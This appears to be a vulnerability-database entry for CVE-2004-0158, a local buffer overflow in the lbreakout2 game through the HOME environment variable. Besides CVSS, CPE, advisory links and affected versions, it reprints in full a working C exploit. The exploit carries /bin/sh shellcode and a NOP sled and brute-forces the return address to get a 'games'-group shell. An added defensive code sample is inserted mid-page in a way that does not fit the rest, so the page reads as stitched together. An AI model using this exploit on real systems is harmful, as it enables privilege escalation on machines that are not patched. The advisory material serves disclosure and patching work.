CVE-2004-0158
CVSS4.6
Published: 2004-03-29 00:00:00
Revised: 2016-10-17 22:41:15

[Original] Buffer overflow in lbreakout2 allows local users to gain 'games' group privileges via a large HOME environment variable to (1) editor.c, (2) theme.c, (3) manager.c, (4) config.c, (5) game.c, (6) levels.c, or (7) main.c.


[CNNVD] LGames LBreakout2 Multiple Environment Variable Buffer Overflow Vulnerability (CNNVD-200403-132)

        
lbreakout2 is a game program for Linux.
lbreakout2 lacks sufficient buffer boundary checks on several environment variables; a local attacker can exploit this vulnerability to execute arbitrary commands with 'games' group privileges.
No detailed vulnerability information is currently available.
        

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may cause system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:lgames:lbreakout2:2.2
cpe:/a:lgames:lbreakout2:2.0.1
cpe:/a:lgames:lbreakout2:2.2.2
cpe:/a:lgames:lbreakout2:2.0
cpe:/a:lgames:lbreakout2:2.1
cpe:/a:lgames:lbreakout2:2.1.1
cpe:/a:lgames:lbreakout2:2.1.2
cpe:/a:lgames:lbreakout2:2.2.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0158
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0158
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-132
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=107755821705356&w=2
(UNKNOWN)  BUGTRAQ  20040222 lbreakout2 < 2.4beta-2 local exploit
http://security.debian.org/pool/updates/main/l/lbreakout2/lbreakout2_2.2.2-1woody1.diff.gz
(UNKNOWN)  CONFIRM  http://security.debian.org/pool/updates/main/l/lbreakout2/lbreakout2_2.2.2-1woody1.diff.gz
http://www.debian.org/security/2004/dsa-445
(VENDOR_ADVISORY)  DEBIAN  DSA-445
http://www.securityfocus.com/bid/9712
(VENDOR_ADVISORY)  BID  9712
http://xforce.iss.net/xforce/xfdb/15229
(VENDOR_ADVISORY)  XF  breakout2-home-bo(15229)

- Vulnerability information

LGames LBreakout2 Multiple Environment Variable Buffer Overflow Vulnerability
Medium severity  Boundary condition error
2004-03-29 00:00:00 2005-10-20 00:00:00
Local
        
lbreakout2 is a game program for Linux.
lbreakout2 lacks sufficient buffer boundary checks on several environment variables; a local attacker can exploit this vulnerability to execute arbitrary commands with 'games' group privileges.
No detailed vulnerability information is currently available.
        

- Advisories and patches

Vendor patches:
Debian
------

http://www.debian.org/security/2004/dsa-445

- Vulnerability information (23738)

LGames LBreakout2 2.2.2 Multiple Environment Variable Buffer Overflow Vulnerabilities (EDBID:23738)
linux local
2004-02-21 Verified
0 Li0n7
N/A
source: http://www.securityfocus.com/bid/9712/info

Multiple buffer overflow vulnerabilities exist in the environment variable handling of LBreakout2. The issue is due to an insufficient boundary checking of certain environment variables used by the affected application.

A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the game process.

/* 
 * lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr
 * vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>
 * usage: ./lbreakout2-exp [-r <RET>][-b [-s <STARTING_RET>]]
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen, strerror */
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <errno.h>

#define BSIZE 200
#define D_START 0xbfffffff
#define PATH "/usr/local/bin/lbreakout2"

void exec_vuln();
int tease();
int make_string(long ret_addr);
int bruteforce(long start);
void banner(char *argv);

char shellcode[]=
      "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
      "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

char *buffer,*ptr;

int 
main(int argc,char *argv[])
{
      char * option_list = "br:s:";
      int option,brute = 0,opterr = 0;
      long ret,start = D_START;

      if (argc < 2) banner(argv[0]);

      while((option = getopt(argc,argv,option_list)) != -1)
          switch(option)
          {
              case 'b':
                  brute = 1;
                  break;
              case 'r':
                  ret = strtoul(optarg,NULL,0);
                  make_string(ret);
                  tease();
                  exit(1);
                  break;
              case 's':
                  start = strtoul(optarg,NULL,0);
                  break;
              case '?':
                  fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
                  banner(argv[0]);
                  exit(1);
          }

      if(brute) 
          bruteforce(start);

      return 0;
}

void 
exec_vuln()
{
      execl(PATH,PATH,NULL);
}

int 
tease()
{
      pid_t pid;
      pid_t wpid;
      int status;

      pid = fork();

      if (pid == -1)
      {
          fprintf(stderr, "[-] %s: Failed to fork()\n",strerror(errno));
          exit(13);
      } 
      else if (pid == 0)
      {
          exec_vuln();
      } 
      else  
      {
          wpid = wait(&status);
          if (wpid == -1)
          {
              fprintf(stderr,"[-] %s: wait()\n",strerror(errno));
              return 1;
          } 
          else if (wpid != pid)
              abort();
          else 
          {
              if (WIFEXITED(status))
              {
                  fprintf(stdout,"[+] Exited: shell's ret code = %d\n",WEXITSTATUS(status));
                  return WEXITSTATUS(status);
              } 
              else if (WIFSIGNALED(status))
                  return WTERMSIG(status);  
              else 
                  fprintf(stderr,"[-] Stopped.\n");
          }
      }
      return 1;
}

int 
make_string(long ret_addr)
{
      int i;
      long ret,addr,*addr_ptr;    
      
      buffer = (char *)malloc(1024);
      if(!buffer)
      {
          fprintf(stderr,"[-] Can't allocate memory\n");
          exit(-1);
      }

      ret = ret_addr;

      ptr = buffer;

      memset(ptr,0x90,BSIZE-strlen(shellcode));
      ptr += BSIZE-strlen(shellcode);

      memcpy(ptr,shellcode,strlen(shellcode));
      ptr += strlen(shellcode);

      addr_ptr = (long *)ptr;
      for(i=0;i<200;i++)
          *(addr_ptr++) = ret;
      ptr = (char *)addr_ptr;
      *ptr = 0;
  
      setenv("HOME",buffer,1);
      return 0;
}

int 
bruteforce(long start)
{
      int ret;
      long i;

      fprintf(stdout,"[+] Starting bruteforcing...\n");
 
      for(i=start;i<0;i=i-50) 
      {
          fprintf(stdout,"[+] Testing 0x%x...\n",i);
          make_string(i);
          ret=tease();
          if(ret==0)
          {
              fprintf(stdout,"[+] Ret address found: 0x%x\n",i);
              break;
          }
      }
      
      return 0;
}

void 
banner(char *argv)
{
      fprintf(stderr,"lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr\n");
      fprintf(stderr,"vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>\n");
      fprintf(stderr,"usage: %s [-r <RET>][-b [-s <STARTING_RET>]]\n",argv);
      exit(1);
}
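The unbounded-copy pattern the description refers to, beside a bounded version that rejects an overlong HOME instead of overflowing, as an added example (not code from lbreakout2, the advisory or the exploit above); the buffer size and the config-file name are assumptions:

```c
/* Added example, not code from lbreakout2, the advisory or the exploit above:
 * building a per-user config path from HOME. Buffer size and the config
 * file name are assumptions made for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 256                          /* assumed fixed buffer size */
#define CONFIG_SUFFIX "/.lbreakout2/config"   /* assumed config file name */

/* The unsafe pattern: HOME is chosen by whoever starts the process, and
 * strcpy/strcat copy it into a fixed buffer with no length check. In a
 * setgid binary the overflow runs as group 'games', as the advisory says. */
void build_config_path_unsafe(char out[PATH_BUF], const char *home)
{
    strcpy(out, home);
    strcat(out, CONFIG_SUFFIX);
}

/* Bounded version. snprintf never writes more than out_len bytes and
 * returns the length the whole string would have had, so an overlong HOME
 * is detected and refused instead of being truncated or written past out.
 * Returns 0 on success, -1 if HOME is unset or the path does not fit. */
int build_config_path_safe(char *out, size_t out_len, const char *home)
{
    int n;

    if (out == NULL || out_len == 0)
        return -1;
    if (home == NULL) {
        out[0] = '\0';
        return -1;
    }
    n = snprintf(out, out_len, "%s%s", home, CONFIG_SUFFIX);
    if (n < 0 || (size_t)n >= out_len) {
        out[0] = '\0';                /* leave no half-written path behind */
        return -1;
    }
    return 0;
}

/* What the game would call at startup: take HOME from the environment and
 * refuse to go on with an unchecked value rather than trusting its length. */
int config_path_from_env(char *out, size_t out_len)
{
    return build_config_path_safe(out, out_len, getenv("HOME"));
}
```

The boundary to check is the exact fit: a HOME of 236 characters plus the 19-character suffix fills the 256-byte buffer with its terminator, and one character more must be refused.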
		

- Vulnerability information

16570
LBreakout2 lbreakout2 HOME Environment Variable Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Unknown Vendor Verified

- Vulnerability description

A local overflow exists in LBreakout2. This issue exists because of a boundary error in the handling of certain environment variables, resulting in a buffer overflow. With a specially crafted request, a malicious user can cause a buffer overflow and potentially execute code with group "games" privileges, resulting in a loss of integrity or availability.

- Timeline

2004-02-22 Unknown
Unknown 2004-06-12

- Solution

Upgrade to version 2.5beta-6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

LGames LBreakout2 Multiple Environment Variable Buffer Overflow Vulnerabilities
Boundary Condition Error 9712
No Yes
2004-02-21 12:00:00 2009-07-12 03:06:00
Discovery of this issue is credited to Ulf Harnhammar.

- Affected program versions

Lgames LBreakout2 2.2.2
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Lgames LBreakout2 2.2.1
Lgames LBreakout2 2.2
Lgames LBreakout2 2.1.2
Lgames LBreakout2 2.1.1
Lgames LBreakout2 2.1
Lgames LBreakout2 2.0.1
Lgames LBreakout2 2.0

- Vulnerability discussion

Multiple buffer overflow vulnerabilities exist in the environment variable handling of LBreakout2. The issue is due to an insufficient boundary checking of certain environment variables used by the affected application.

A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the game process.

- Exploit

The following exploit was released:

- Solution

Debian Linux has released advisory DSA 445-1 dealing with this issue.


Lgames LBreakout2 2.2.2

- Related references

 

 
